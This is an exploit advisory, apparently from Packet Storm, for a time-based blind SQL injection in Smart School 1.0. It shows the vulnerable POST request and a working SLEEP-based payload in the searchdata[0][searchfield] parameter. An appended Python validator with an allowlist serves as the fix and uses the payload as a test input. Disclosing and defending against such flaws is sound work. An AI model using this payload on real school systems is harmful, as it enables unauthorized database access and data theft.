
Smart School 1.0 SQL Injection

Smart School version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql #vulnerability #linux #auth #firefox
# Exploit Title: Smart School v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018
# Demo Site: https://demo.smart-school.in
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /course/filterRecords/ HTTP/1.1
Host: localhost
Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://localhost
Referer: https://localhost/course/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1

### Parameter & Payloads ###

Parameter: searchdata[0][searchfield] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--hAHp&searchdata[0][searchvalue]=1
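The injectable parameter carries a column name, so it cannot be bound as a query value and has to be checked against a fixed set of identifiers. The following is an added example, not part of the original advisory or Smart School's code: a validator for the `searchdata[N][searchfield]` values of a `/course/filterRecords/` body, usable as an input check or as a log/WAF detection. The allowlist contents and the function name `check_filter_body` are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Assumption: columns the course filter may reference. Only
# online_courses.category_id appears in the advisory; extend per deployment.
ALLOWED_SEARCH_FIELDS = {"online_courses.category_id"}

FIELD_KEY = re.compile(r"^searchdata\[(\d+)\]\[searchfield\]$")
# A bare column reference, optionally qualified by a table name.
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$")

# Request bodies copied from the advisory above.
BENIGN_BODY = (
    "searchdata%5B0%5D%5Btitle%5D=category"
    "&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id"
    "&searchdata%5B0%5D%5Bsearchvalue%5D=1"
)
INJECTED_BODY = (
    "searchdata[0][title]=category"
    "&searchdata[0][searchfield]=online_courses.category_id "
    "AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--hAHp"
    "&searchdata[0][searchvalue]=1"
)


def check_filter_body(body):
    """Return (index, value, reason) for every rejected searchfield value."""
    findings = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = FIELD_KEY.match(key)
        if not match:
            continue  # title / searchvalue entries are not column names
        index = int(match.group(1))
        if not IDENTIFIER.match(value):
            # Whitespace, parentheses, comments etc. never belong in a column name.
            findings.append((index, value, "not a column identifier"))
        elif value not in ALLOWED_SEARCH_FIELDS:
            findings.append((index, value, "column not in allowlist"))
    return findings


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("injected", INJECTED_BODY)):
        print(name, check_filter_body(body) or "ok")
```

In the application itself the same idea applies at query-building time: map the submitted value to a server-side constant column name and reject anything else, while `searchvalue` is passed as a bound parameter.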
